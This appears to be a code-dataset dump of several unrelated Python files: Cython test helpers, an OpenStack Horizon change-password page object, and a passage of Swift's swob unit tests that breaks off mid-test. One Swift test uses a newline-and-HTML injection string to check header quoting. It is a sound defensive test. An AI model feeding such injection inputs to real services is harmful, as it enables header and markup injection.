self.result.append(u" " * self._indents +
u"%s: %s" % (name, node.__class__.__name__))
self._indents += 1
self.visitchildren(node)
self._indents -= 1
def treetypes(root):
"""Returns a string representing the tree by class names.
There's a leading and trailing whitespace so that it can be
compared by simple string comparison while still making test
cases look ok."""
w = NodeTypeWriter()
w.visit(root)
return u"\n".join([u""] + w.result + [u""])
class CythonTest(unittest.TestCase):
def setUp(self):
self.listing_file = Errors.listing_file
self.echo_file = Errors.echo_file
Errors.listing_file = Errors.echo_file = None
def tearDown(self):
Errors.listing_file = self.listing_file
Errors.echo_file = self.echo_file
def assertLines(self, expected, result):
"Checks that the given strings or lists of strings are equal line by line"
if not isinstance(expected, list): expected = expected.split(u"\n")
if not isinstance(result, list): result = result.split(u"\n")
for idx, (expected_line, result_line) in enumerate(zip(expected, result)):
self.assertEqual(expected_line, result_line, "Line %d:\nExp: %s\nGot: %s" % (idx, expected_line, result_line))
self.assertEqual(len(expected), len(result),
"Unmatched lines. Got:\n%s\nExpected:\n%s" % ("\n".join(expected), u"\n".join(result)))
def codeToLines(self, tree):
writer = CodeWriter()
writer.write(tree)
return writer.result.lines
def codeToString(self, tree):
return "\n".join(self.codeToLines(tree))
def assertCode(self, expected, result_tree):
result_lines = self.codeToLines(result_tree)
expected_lines = strip_common_indent(expected.split("\n"))
for idx, (line, expected_line) in enumerate(zip(result_lines, expected_lines)):
self.assertEqual(expected_line, line, "Line %d:\nGot: %s\nExp: %s" % (idx, line, expected_line))
self.assertEqual(len(result_lines), len(expected_lines),
"Unmatched lines. Got:\n%s\nExpected:\n%s" % ("\n".join(result_lines), expected))
def assertNodeExists(self, path, result_tree):
self.assertNotEqual(TreePath.find_first(result_tree, path), None,
"Path '%s' not found in result tree" % path)
def fragment(self, code, pxds={}, pipeline=[]):
"Simply create a tree fragment using the name of the test-case in parse errors."
name = self.id()
if name.startswith("__main__."): name = name[len("__main__."):]
name = name.replace(".", "_")
return TreeFragment(code, name, pxds, pipeline=pipeline)
def treetypes(self, root):
return treetypes(root)
def should_fail(self, func, exc_type=Exception):
"""Calls "func" and fails if it doesn't raise the right exception
(any exception by default). Also returns the exception in question.
"""
try:
func()
self.fail("Expected an exception of type %r" % exc_type)
except exc_type as e:
self.assert_(isinstance(e, exc_type))
return e
def should_not_fail(self, func):
"""Calls func and succeeds if and only if no exception is raised
(i.e. converts exception raising into a failed testcase). Returns
the return value of func."""
try:
return func()
except:
self.fail(str(sys.exc_info()[1]))
class TransformTest(CythonTest):
"""
Utility base class for transform unit tests. It is based around constructing
test trees (either explicitly or by parsing a Cython code string); running
the transform, serialize it using a customized Cython serializer (with
special markup for nodes that cannot be represented in Cython),
and do a string-comparison line-by-line of the result.
To create a test case:
- Call run_pipeline. The pipeline should at least contain the transform you
are testing; pyx should be either a string (passed to the parser to
create a post-parse tree) or a node representing input to pipeline.
The result will be a transformed result.
- Check that the tree is correct. If wanted, assertCode can be used, which
takes a code string as expected, and a ModuleNode in result_tree
(it serializes the ModuleNode to a string and compares line-by-line).
All code strings are first stripped for whitespace lines and then common
indentation.
Plans: One could have a pxd dictionary parameter to run_pipeline.
"""
def run_pipeline(self, pipeline, pyx, pxds={}):
tree = self.fragment(pyx, pxds).root
# Run pipeline
for T in pipeline:
tree = T(tree)
return tree
class TreeAssertVisitor(VisitorTransform):
# actually, a TreeVisitor would be enough, but this needs to run
# as part of the compiler pipeline
def visit_CompilerDirectivesNode(self, node):
directives = node.directives
if 'test_assert_path_exists' in directives:
for path in directives['test_assert_path_exists']:
if TreePath.find_first(node, path) is None:
Errors.error(
node.pos,
"Expected path '%s' not found in result tree" % path)
if 'test_fail_if_path_exists' in directives:
for path in directives['test_fail_if_path_exists']:
if TreePath.find_first(node, path) is not None:
Errors.error(
node.pos,
"Unexpected path '%s' found in result tree" % path)
self.visitchildren(node)
return node
visit_Node = VisitorTransform.recurse_to_children
def unpack_source_tree(tree_file, dir=None):
if dir is None:
dir = tempfile.mkdtemp()
header = []
cur_file = None
f = open(tree_file)
try:
lines = f.readlines()
finally:
f.close()
del f
try:
for line in lines:
if line[:5] == '#####':
filename = line.strip().strip('#').strip().replace('/', os.path.sep)
path = os.path.join(dir, filename)
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
if cur_file is not None:
f, cur_file = cur_file, None
f.close()
cur_file = open(path, 'w')
elif cur_file is not None:
cur_file.write(line)
elif line.strip() and not line.lstrip().startswith('#'):
if line.strip() not in ('"""', "'''"):
header.append(line)
finally:
if cur_file is not None:
cur_file.close()
return dir, ''.join(header)
| apache-2.0 |
redhat-cip/horizon | openstack_dashboard/test/integration_tests/pages/settings/changepasswordpage.py | 5 | 2004 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.regions import forms
class ChangepasswordPage(basepage.BaseNavigationPage):
_password_form_locator = (by.By.ID, 'change_password_modal')
CHANGE_PASSWORD_FORM_FIELDS = ("current_password", "new_password",
"confirm_password")
@property
def password_form(self):
src_elem = self._get_element(*self._password_form_locator)
return forms.FormRegion(self.driver, self.conf, src_elem,
self.CHANGE_PASSWORD_FORM_FIELDS)
def change_password(self, current, new):
self.password_form.current_password.text = current
self.password_form.new_password.text = new
self.password_form.confirm_password.text = new
self.password_form.submit.click()
self.wait_till_popups_disappear()
def reset_to_default_password(self, current):
if self.topbar.user.text == self.conf.identity.admin_username:
return self.change_password(current,
self.conf.identity.admin_password)
else:
return self.change_password(current,
self.conf.identity.password)
| apache-2.0 |
zackmdavis/swift | test/unit/common/test_swob.py | 2 | 72249 | # Copyright (c) 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"Tests for swift.common.swob"
import datetime
import unittest
import re
import time
from StringIO import StringIO
from urllib import quote
import swift.common.swob
from swift.common import utils, exceptions
class TestHeaderEnvironProxy(unittest.TestCase):
def test_proxy(self):
environ = {}
proxy = swift.common.swob.HeaderEnvironProxy(environ)
proxy['Content-Length'] = 20
proxy['Content-Type'] = 'text/plain'
proxy['Something-Else'] = 'somevalue'
self.assertEquals(
proxy.environ, {'CONTENT_LENGTH': '20',
'CONTENT_TYPE': 'text/plain',
'HTTP_SOMETHING_ELSE': 'somevalue'})
self.assertEquals(proxy['content-length'], '20')
self.assertEquals(proxy['content-type'], 'text/plain')
self.assertEquals(proxy['something-else'], 'somevalue')
def test_del(self):
environ = {}
proxy = swift.common.swob.HeaderEnvironProxy(environ)
proxy['Content-Length'] = 20
proxy['Content-Type'] = 'text/plain'
proxy['Something-Else'] = 'somevalue'
del proxy['Content-Length']
del proxy['Content-Type']
del proxy['Something-Else']
self.assertEquals(proxy.environ, {})
def test_contains(self):
environ = {}
proxy = swift.common.swob.HeaderEnvironProxy(environ)
proxy['Content-Length'] = 20
proxy['Content-Type'] = 'text/plain'
proxy['Something-Else'] = 'somevalue'
self.assert_('content-length' in proxy)
self.assert_('content-type' in proxy)
self.assert_('something-else' in proxy)
def test_keys(self):
environ = {}
proxy = swift.common.swob.HeaderEnvironProxy(environ)
proxy['Content-Length'] = 20
proxy['Content-Type'] = 'text/plain'
proxy['Something-Else'] = 'somevalue'
self.assertEquals(
set(proxy.keys()),
set(('Content-Length', 'Content-Type', 'Something-Else')))
class TestHeaderKeyDict(unittest.TestCase):
def test_case_insensitive(self):
headers = swift.common.swob.HeaderKeyDict()
headers['Content-Length'] = 0
headers['CONTENT-LENGTH'] = 10
headers['content-length'] = 20
self.assertEquals(headers['Content-Length'], '20')
self.assertEquals(headers['content-length'], '20')
self.assertEquals(headers['CONTENT-LENGTH'], '20')
def test_setdefault(self):
headers = swift.common.swob.HeaderKeyDict()
# it gets set
headers.setdefault('x-rubber-ducky', 'the one')
self.assertEquals(headers['X-Rubber-Ducky'], 'the one')
# it has the right return value
ret = headers.setdefault('x-boat', 'dinghy')
self.assertEquals(ret, 'dinghy')
ret = headers.setdefault('x-boat', 'yacht')
self.assertEquals(ret, 'dinghy')
# shouldn't crash
headers.setdefault('x-sir-not-appearing-in-this-request', None)
def test_del_contains(self):
headers = swift.common.swob.HeaderKeyDict()
headers['Content-Length'] = 0
self.assert_('Content-Length' in headers)
del headers['Content-Length']
self.assert_('Content-Length' not in headers)
def test_update(self):
headers = swift.common.swob.HeaderKeyDict()
headers.update({'Content-Length': '0'})
headers.update([('Content-Type', 'text/plain')])
self.assertEquals(headers['Content-Length'], '0')
self.assertEquals(headers['Content-Type'], 'text/plain')
def test_get(self):
headers = swift.common.swob.HeaderKeyDict()
headers['content-length'] = 20
self.assertEquals(headers.get('CONTENT-LENGTH'), '20')
self.assertEquals(headers.get('something-else'), None)
self.assertEquals(headers.get('something-else', True), True)
def test_keys(self):
headers = swift.common.swob.HeaderKeyDict()
headers['content-length'] = 20
headers['cOnTent-tYpe'] = 'text/plain'
headers['SomeThing-eLse'] = 'somevalue'
self.assertEquals(
set(headers.keys()),
set(('Content-Length', 'Content-Type', 'Something-Else')))
class TestRange(unittest.TestCase):
def test_range(self):
range = swift.common.swob.Range('bytes=1-7')
self.assertEquals(range.ranges[0], (1, 7))
def test_upsidedown_range(self):
range = swift.common.swob.Range('bytes=5-10')
self.assertEquals(range.ranges_for_length(2), [])
def test_str(self):
for range_str in ('bytes=1-7', 'bytes=1-', 'bytes=-1',
'bytes=1-7,9-12', 'bytes=-7,9-'):
range = swift.common.swob.Range(range_str)
self.assertEquals(str(range), range_str)
def test_ranges_for_length(self):
range = swift.common.swob.Range('bytes=1-7')
self.assertEquals(range.ranges_for_length(10), [(1, 8)])
self.assertEquals(range.ranges_for_length(5), [(1, 5)])
self.assertEquals(range.ranges_for_length(None), None)
def test_ranges_for_large_length(self):
range = swift.common.swob.Range('bytes=-1000000000000000000000000000')
self.assertEquals(range.ranges_for_length(100), [(0, 100)])
def test_ranges_for_length_no_end(self):
range = swift.common.swob.Range('bytes=1-')
self.assertEquals(range.ranges_for_length(10), [(1, 10)])
self.assertEquals(range.ranges_for_length(5), [(1, 5)])
self.assertEquals(range.ranges_for_length(None), None)
# This used to freak out:
range = swift.common.swob.Range('bytes=100-')
self.assertEquals(range.ranges_for_length(5), [])
self.assertEquals(range.ranges_for_length(None), None)
range = swift.common.swob.Range('bytes=4-6,100-')
self.assertEquals(range.ranges_for_length(5), [(4, 5)])
def test_ranges_for_length_no_start(self):
range = swift.common.swob.Range('bytes=-7')
self.assertEquals(range.ranges_for_length(10), [(3, 10)])
self.assertEquals(range.ranges_for_length(5), [(0, 5)])
self.assertEquals(range.ranges_for_length(None), None)
range = swift.common.swob.Range('bytes=4-6,-100')
self.assertEquals(range.ranges_for_length(5), [(4, 5), (0, 5)])
def test_ranges_for_length_multi(self):
range = swift.common.swob.Range('bytes=-20,4-')
self.assertEquals(len(range.ranges_for_length(200)), 2)
# the actual length greater than each range element
self.assertEquals(range.ranges_for_length(200), [(180, 200), (4, 200)])
range = swift.common.swob.Range('bytes=30-150,-10')
self.assertEquals(len(range.ranges_for_length(200)), 2)
# the actual length lands in the middle of a range
self.assertEquals(range.ranges_for_length(90), [(30, 90), (80, 90)])
# the actual length greater than any of the range
self.assertEquals(range.ranges_for_length(200),
[(30, 151), (190, 200)])
self.assertEquals(range.ranges_for_length(None), None)
def test_ranges_for_length_edges(self):
range = swift.common.swob.Range('bytes=0-1, -7')
self.assertEquals(range.ranges_for_length(10),
[(0, 2), (3, 10)])
range = swift.common.swob.Range('bytes=-7, 0-1')
self.assertEquals(range.ranges_for_length(10),
[(3, 10), (0, 2)])
range = swift.common.swob.Range('bytes=-7, 0-1')
self.assertEquals(range.ranges_for_length(5),
[(0, 5), (0, 2)])
def test_ranges_for_length_overlapping(self):
# Fewer than 3 overlaps is okay
range = swift.common.swob.Range('bytes=10-19,15-24')
self.assertEquals(range.ranges_for_length(100),
[(10, 20), (15, 25)])
range = swift.common.swob.Range('bytes=10-19,15-24,20-29')
self.assertEquals(range.ranges_for_length(100),
[(10, 20), (15, 25), (20, 30)])
# Adjacent ranges, though suboptimal, don't overlap
range = swift.common.swob.Range('bytes=10-19,20-29,30-39')
self.assertEquals(range.ranges_for_length(100),
[(10, 20), (20, 30), (30, 40)])
# Ranges that share a byte do overlap
range = swift.common.swob.Range('bytes=10-20,20-30,30-40,40-50')
self.assertEquals(range.ranges_for_length(100), [])
# With suffix byte range specs (e.g. bytes=-2), make sure that we
# correctly determine overlapping-ness based on the entity length
range = swift.common.swob.Range('bytes=10-15,15-20,30-39,-9')
self.assertEquals(range.ranges_for_length(100),
[(10, 16), (15, 21), (30, 40), (91, 100)])
self.assertEquals(range.ranges_for_length(20), [])
def test_ranges_for_length_nonascending(self):
few_ranges = ("bytes=100-109,200-209,300-309,500-509,"
"400-409,600-609,700-709")
many_ranges = few_ranges + ",800-809"
range = swift.common.swob.Range(few_ranges)
self.assertEquals(range.ranges_for_length(100000),
[(100, 110), (200, 210), (300, 310), (500, 510),
(400, 410), (600, 610), (700, 710)])
range = swift.common.swob.Range(many_ranges)
self.assertEquals(range.ranges_for_length(100000), [])
def test_ranges_for_length_too_many(self):
at_the_limit_ranges = (
"bytes=" + ",".join("%d-%d" % (x * 1000, x * 1000 + 10)
for x in range(50)))
too_many_ranges = at_the_limit_ranges + ",10000000-10000009"
rng = swift.common.swob.Range(at_the_limit_ranges)
self.assertEquals(len(rng.ranges_for_length(1000000000)), 50)
rng = swift.common.swob.Range(too_many_ranges)
self.assertEquals(rng.ranges_for_length(1000000000), [])
def test_range_invalid_syntax(self):
def _check_invalid_range(range_value):
try:
swift.common.swob.Range(range_value)
return False
except ValueError:
return True
"""
All the following cases should result ValueError exception
1. value not starts with bytes=
2. range value start is greater than the end, eg. bytes=5-3
3. range does not have start or end, eg. bytes=-
4. range does not have hyphen, eg. bytes=45
5. range value is non numeric
6. any combination of the above
"""
self.assert_(_check_invalid_range('nonbytes=foobar,10-2'))
self.assert_(_check_invalid_range('bytes=5-3'))
self.assert_(_check_invalid_range('bytes=-'))
self.assert_(_check_invalid_range('bytes=45'))
self.assert_(_check_invalid_range('bytes=foo-bar,3-5'))
self.assert_(_check_invalid_range('bytes=4-10,45'))
self.assert_(_check_invalid_range('bytes=foobar,3-5'))
self.assert_(_check_invalid_range('bytes=nonumber-5'))
self.assert_(_check_invalid_range('bytes=nonumber'))
class TestMatch(unittest.TestCase):
def test_match(self):
match = swift.common.swob.Match('"a", "b"')
self.assertEquals(match.tags, set(('a', 'b')))
self.assert_('a' in match)
self.assert_('b' in match)
self.assert_('c' not in match)
def test_match_star(self):
match = swift.common.swob.Match('"a", "*"')
self.assert_('a' in match)
self.assert_('b' in match)
self.assert_('c' in match)
def test_match_noquote(self):
match = swift.common.swob.Match('a, b')
self.assertEquals(match.tags, set(('a', 'b')))
self.assert_('a' in match)
self.assert_('b' in match)
self.assert_('c' not in match)
class TestAccept(unittest.TestCase):
def test_accept_json(self):
for accept in ('application/json', 'application/json;q=1.0,*/*;q=0.9',
'*/*;q=0.9,application/json;q=1.0', 'application/*',
'text/*,application/json', 'application/*,text/*',
'application/json,text/xml'):
acc = swift.common.swob.Accept(accept)
match = acc.best_match(['text/plain', 'application/json',
'application/xml', 'text/xml'])
self.assertEquals(match, 'application/json')
def test_accept_plain(self):
for accept in ('', 'text/plain', 'application/xml;q=0.8,*/*;q=0.9',
'*/*;q=0.9,application/xml;q=0.8', '*/*',
'text/plain,application/xml'):
acc = swift.common.swob.Accept(accept)
match = acc.best_match(['text/plain', 'application/json',
'application/xml', 'text/xml'])
self.assertEquals(match, 'text/plain')
def test_accept_xml(self):
for accept in ('application/xml', 'application/xml;q=1.0,*/*;q=0.9',
'*/*;q=0.9,application/xml;q=1.0',
'application/xml;charset=UTF-8',
'application/xml;charset=UTF-8;qws="quoted with space"',
'application/xml; q=0.99 ; qws="quoted with space"'):
acc = swift.common.swob.Accept(accept)
match = acc.best_match(['text/plain', 'application/xml',
'text/xml'])
self.assertEquals(match, 'application/xml')
def test_accept_invalid(self):
for accept in ('*', 'text/plain,,', 'some stuff',
'application/xml;q=1.0;q=1.1', 'text/plain,*',
'text /plain', 'text\x7f/plain',
'text/plain;a=b=c',
'text/plain;q=1;q=2',
'text/plain; ubq="unbalanced " quotes"'):
acc = swift.common.swob.Accept(accept)
match = acc.best_match(['text/plain', 'application/xml',
'text/xml'])
self.assertEquals(match, None)
def test_repr(self):
acc = swift.common.swob.Accept("application/json")
self.assertEquals(repr(acc), "application/json")
class TestRequest(unittest.TestCase):
def test_blank(self):
req = swift.common.swob.Request.blank(
'/', environ={'REQUEST_METHOD': 'POST'},
headers={'Content-Type': 'text/plain'}, body='hi')
self.assertEquals(req.path_info, '/')
self.assertEquals(req.body, 'hi')
self.assertEquals(req.headers['Content-Type'], 'text/plain')
self.assertEquals(req.method, 'POST')
def test_blank_req_environ_property_args(self):
blank = swift.common.swob.Request.blank
req = blank('/', method='PATCH')
self.assertEquals(req.method, 'PATCH')
self.assertEquals(req.environ['REQUEST_METHOD'], 'PATCH')
req = blank('/', referer='http://example.com')
self.assertEquals(req.referer, 'http://example.com')
self.assertEquals(req.referrer, 'http://example.com')
self.assertEquals(req.environ['HTTP_REFERER'], 'http://example.com')
self.assertEquals(req.headers['Referer'], 'http://example.com')
req = blank('/', script_name='/application')
self.assertEquals(req.script_name, '/application')
self.assertEquals(req.environ['SCRIPT_NAME'], '/application')
req = blank('/', host='www.example.com')
self.assertEquals(req.host, 'www.example.com')
self.assertEquals(req.environ['HTTP_HOST'], 'www.example.com')
self.assertEquals(req.headers['Host'], 'www.example.com')
req = blank('/', remote_addr='127.0.0.1')
self.assertEquals(req.remote_addr, '127.0.0.1')
self.assertEquals(req.environ['REMOTE_ADDR'], '127.0.0.1')
req = blank('/', remote_user='username')
self.assertEquals(req.remote_user, 'username')
self.assertEquals(req.environ['REMOTE_USER'], 'username')
req = blank('/', user_agent='curl/7.22.0 (x86_64-pc-linux-gnu)')
self.assertEquals(req.user_agent, 'curl/7.22.0 (x86_64-pc-linux-gnu)')
self.assertEquals(req.environ['HTTP_USER_AGENT'],
'curl/7.22.0 (x86_64-pc-linux-gnu)')
self.assertEquals(req.headers['User-Agent'],
'curl/7.22.0 (x86_64-pc-linux-gnu)')
req = blank('/', query_string='a=b&c=d')
self.assertEquals(req.query_string, 'a=b&c=d')
self.assertEquals(req.environ['QUERY_STRING'], 'a=b&c=d')
req = blank('/', if_match='*')
self.assertEquals(req.environ['HTTP_IF_MATCH'], '*')
self.assertEquals(req.headers['If-Match'], '*')
# multiple environ property kwargs
req = blank('/', method='PATCH', referer='http://example.com',
script_name='/application', host='www.example.com',
remote_addr='127.0.0.1', remote_user='username',
user_agent='curl/7.22.0 (x86_64-pc-linux-gnu)',
query_string='a=b&c=d', if_match='*')
self.assertEquals(req.method, 'PATCH')
self.assertEquals(req.referer, 'http://example.com')
self.assertEquals(req.script_name, '/application')
self.assertEquals(req.host, 'www.example.com')
self.assertEquals(req.remote_addr, '127.0.0.1')
self.assertEquals(req.remote_user, 'username')
self.assertEquals(req.user_agent, 'curl/7.22.0 (x86_64-pc-linux-gnu)')
self.assertEquals(req.query_string, 'a=b&c=d')
self.assertEquals(req.environ['QUERY_STRING'], 'a=b&c=d')
def test_invalid_req_environ_property_args(self):
# getter only property
try:
swift.common.swob.Request.blank('/', params={'a': 'b'})
except TypeError as e:
self.assertEquals("got unexpected keyword argument 'params'",
str(e))
else:
self.assert_(False, "invalid req_environ_property "
"didn't raise error!")
# regular attribute
try:
swift.common.swob.Request.blank('/', _params_cache={'a': 'b'})
except TypeError as e:
self.assertEquals("got unexpected keyword "
"argument '_params_cache'", str(e))
else:
self.assert_(False, "invalid req_environ_property "
"didn't raise error!")
# non-existent attribute
try:
swift.common.swob.Request.blank('/', params_cache={'a': 'b'})
except TypeError as e:
self.assertEquals("got unexpected keyword "
"argument 'params_cache'", str(e))
else:
self.assert_(False, "invalid req_environ_property "
"didn't raise error!")
# method
try:
swift.common.swob.Request.blank(
'/', as_referer='GET http://example.com')
except TypeError as e:
self.assertEquals("got unexpected keyword "
"argument 'as_referer'", str(e))
else:
self.assert_(False, "invalid req_environ_property "
"didn't raise error!")
def test_blank_path_info_precedence(self):
blank = swift.common.swob.Request.blank
req = blank('/a')
self.assertEquals(req.path_info, '/a')
req = blank('/a', environ={'PATH_INFO': '/a/c'})
self.assertEquals(req.path_info, '/a/c')
req = blank('/a', environ={'PATH_INFO': '/a/c'}, path_info='/a/c/o')
self.assertEquals(req.path_info, '/a/c/o')
req = blank('/a', path_info='/a/c/o')
self.assertEquals(req.path_info, '/a/c/o')
def test_blank_body_precedence(self):
req = swift.common.swob.Request.blank(
'/', environ={'REQUEST_METHOD': 'POST',
'wsgi.input': StringIO('')},
headers={'Content-Type': 'text/plain'}, body='hi')
self.assertEquals(req.path_info, '/')
self.assertEquals(req.body, 'hi')
self.assertEquals(req.headers['Content-Type'], 'text/plain')
self.assertEquals(req.method, 'POST')
body_file = StringIO('asdf')
req = swift.common.swob.Request.blank(
'/', environ={'REQUEST_METHOD': 'POST',
'wsgi.input': StringIO('')},
headers={'Content-Type': 'text/plain'}, body='hi',
body_file=body_file)
self.assert_(req.body_file is body_file)
req = swift.common.swob.Request.blank(
'/', environ={'REQUEST_METHOD': 'POST',
'wsgi.input': StringIO('')},
headers={'Content-Type': 'text/plain'}, body='hi',
content_length=3)
self.assertEquals(req.content_length, 3)
self.assertEquals(len(req.body), 2)
def test_blank_parsing(self):
req = swift.common.swob.Request.blank('http://test.com/')
self.assertEquals(req.environ['wsgi.url_scheme'], 'http')
self.assertEquals(req.environ['SERVER_PORT'], '80')
self.assertEquals(req.environ['SERVER_NAME'], 'test.com')
req = swift.common.swob.Request.blank('https://test.com:456/')
self.assertEquals(req.environ['wsgi.url_scheme'], 'https')
self.assertEquals(req.environ['SERVER_PORT'], '456')
req = swift.common.swob.Request.blank('test.com/')
self.assertEquals(req.environ['wsgi.url_scheme'], 'http')
self.assertEquals(req.environ['SERVER_PORT'], '80')
self.assertEquals(req.environ['PATH_INFO'], 'test.com/')
self.assertRaises(TypeError, swift.common.swob.Request.blank,
'ftp://test.com/')
def test_params(self):
req = swift.common.swob.Request.blank('/?a=b&c=d')
self.assertEquals(req.params['a'], 'b')
self.assertEquals(req.params['c'], 'd')
def test_timestamp_missing(self):
req = swift.common.swob.Request.blank('/')
self.assertRaises(exceptions.InvalidTimestamp,
getattr, req, 'timestamp')
def test_timestamp_invalid(self):
req = swift.common.swob.Request.blank(
'/', headers={'X-Timestamp': 'asdf'})
self.assertRaises(exceptions.InvalidTimestamp,
getattr, req, 'timestamp')
def test_timestamp(self):
req = swift.common.swob.Request.blank(
'/', headers={'X-Timestamp': '1402447134.13507_00000001'})
expected = utils.Timestamp('1402447134.13507', offset=1)
self.assertEqual(req.timestamp, expected)
self.assertEqual(req.timestamp.normal, expected.normal)
self.assertEqual(req.timestamp.internal, expected.internal)
def test_path(self):
req = swift.common.swob.Request.blank('/hi?a=b&c=d')
self.assertEquals(req.path, '/hi')
req = swift.common.swob.Request.blank(
'/', environ={'SCRIPT_NAME': '/hi', 'PATH_INFO': '/there'})
self.assertEquals(req.path, '/hi/there')
def test_path_question_mark(self):
req = swift.common.swob.Request.blank('/test%3Ffile')
# This tests that .blank unquotes the path when setting PATH_INFO
self.assertEquals(req.environ['PATH_INFO'], '/test?file')
# This tests that .path requotes it
self.assertEquals(req.path, '/test%3Ffile')
def test_path_info_pop(self):
req = swift.common.swob.Request.blank('/hi/there')
self.assertEquals(req.path_info_pop(), 'hi')
self.assertEquals(req.path_info, '/there')
self.assertEquals(req.script_name, '/hi')
def test_bad_path_info_pop(self):
req = swift.common.swob.Request.blank('blahblah')
self.assertEquals(req.path_info_pop(), None)
def test_path_info_pop_last(self):
req = swift.common.swob.Request.blank('/last')
self.assertEquals(req.path_info_pop(), 'last')
self.assertEquals(req.path_info, '')
self.assertEquals(req.script_name, '/last')
def test_path_info_pop_none(self):
req = swift.common.swob.Request.blank('/')
self.assertEquals(req.path_info_pop(), '')
self.assertEquals(req.path_info, '')
self.assertEquals(req.script_name, '/')
def test_copy_get(self):
req = swift.common.swob.Request.blank(
'/hi/there', environ={'REQUEST_METHOD': 'POST'})
self.assertEquals(req.method, 'POST')
req2 = req.copy_get()
self.assertEquals(req2.method, 'GET')
def test_get_response(self):
def test_app(environ, start_response):
start_response('200 OK', [])
return ['hi']
req = swift.common.swob.Request.blank('/')
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.body, 'hi')
def test_401_unauthorized(self):
# No request environment
resp = swift.common.swob.HTTPUnauthorized()
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
# Request environment
req = swift.common.swob.Request.blank('/')
resp = swift.common.swob.HTTPUnauthorized(request=req)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
def test_401_valid_account_path(self):
def test_app(environ, start_response):
start_response('401 Unauthorized', [])
return ['hi']
# Request environment contains valid account in path
req = swift.common.swob.Request.blank('/v1/account-name')
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
self.assertEquals('Swift realm="account-name"',
resp.headers['Www-Authenticate'])
# Request environment contains valid account/container in path
req = swift.common.swob.Request.blank('/v1/account-name/c')
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
self.assertEquals('Swift realm="account-name"',
resp.headers['Www-Authenticate'])
def test_401_invalid_path(self):
def test_app(environ, start_response):
start_response('401 Unauthorized', [])
return ['hi']
# Request environment contains bad path
req = swift.common.swob.Request.blank('/random')
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
self.assertEquals('Swift realm="unknown"',
resp.headers['Www-Authenticate'])
def test_401_non_keystone_auth_path(self):
def test_app(environ, start_response):
start_response('401 Unauthorized', [])
return ['no creds in request']
# Request to get token
req = swift.common.swob.Request.blank('/v1.0/auth')
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
self.assertEquals('Swift realm="unknown"',
resp.headers['Www-Authenticate'])
# Other form of path
req = swift.common.swob.Request.blank('/auth/v1.0')
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
self.assertEquals('Swift realm="unknown"',
resp.headers['Www-Authenticate'])
def test_401_www_authenticate_exists(self):
def test_app(environ, start_response):
start_response('401 Unauthorized', {
'Www-Authenticate': 'Me realm="whatever"'})
return ['no creds in request']
# Auth middleware sets own Www-Authenticate
req = swift.common.swob.Request.blank('/auth/v1.0')
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
self.assertEquals('Me realm="whatever"',
resp.headers['Www-Authenticate'])
def test_401_www_authenticate_is_quoted(self):
def test_app(environ, start_response):
start_response('401 Unauthorized', [])
return ['hi']
hacker = 'account-name\n\n<b>foo<br>' # url injection test
quoted_hacker = quote(hacker)
req = swift.common.swob.Request.blank('/v1/' + hacker)
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
self.assertEquals('Swift realm="%s"' % quoted_hacker,
resp.headers['Www-Authenticate'])
req = swift.common.swob.Request.blank('/v1/' + quoted_hacker)
resp = req.get_response(test_app)
self.assertEquals(resp.status_int, 401)
self.assert_('Www-Authenticate' in resp.headers)
self.assertEquals('Swift realm="%s"' % quoted_hacker,
resp.headers['Www-Authenticate'])
def test_not_401(self):
# Other status codes should not have WWW-Authenticate in response
def test_app(environ, start_response):
start_response('200 OK', [])
return ['hi']
req = swift.common.swob.Request.blank('/')
resp = req.get_response(test_app)
self.assert_('Www-Authenticate' not in resp.headers)
def test_properties(self):
req = swift.common.swob.Request.blank('/hi/there', body='hi')
self.assertEquals(req.body, 'hi')
self.assertEquals(req.content_length, 2)
req.remote_addr = 'something'
self.assertEquals(req.environ['REMOTE_ADDR'], 'something')
req.body = 'whatever'
self.assertEquals(req.content_length, 8)
self.assertEquals(req.body, 'whatever')
self.assertEquals(req.method, 'GET')
req.range = 'bytes=1-7'
self.assertEquals(req.range.ranges[0], (1, 7))
self.assert_('Range' in req.headers)
req.range = None
self.assert_('Range' not in req.headers)
def test_datetime_properties(self):
req = swift.common.swob.Request.blank('/hi/there', body='hi')
req.if_unmodified_since = 0
self.assert_(isinstance(req.if_unmodified_since, datetime.datetime))
if_unmodified_since = req.if_unmodified_since
req.if_unmodified_since = if_unmodified_since
self.assertEquals(if_unmodified_since, req.if_unmodified_since)
req.if_unmodified_since = 'something'
self.assertEquals(req.headers['If-Unmodified-Since'], 'something')
self.assertEquals(req.if_unmodified_since, None)
self.assert_('If-Unmodified-Since' in req.headers)
req.if_unmodified_since = None
self.assert_('If-Unmodified-Since' not in req.headers)
too_big_date_list = list(datetime.datetime.max.timetuple())
too_big_date_list[0] += 1 # bump up the year
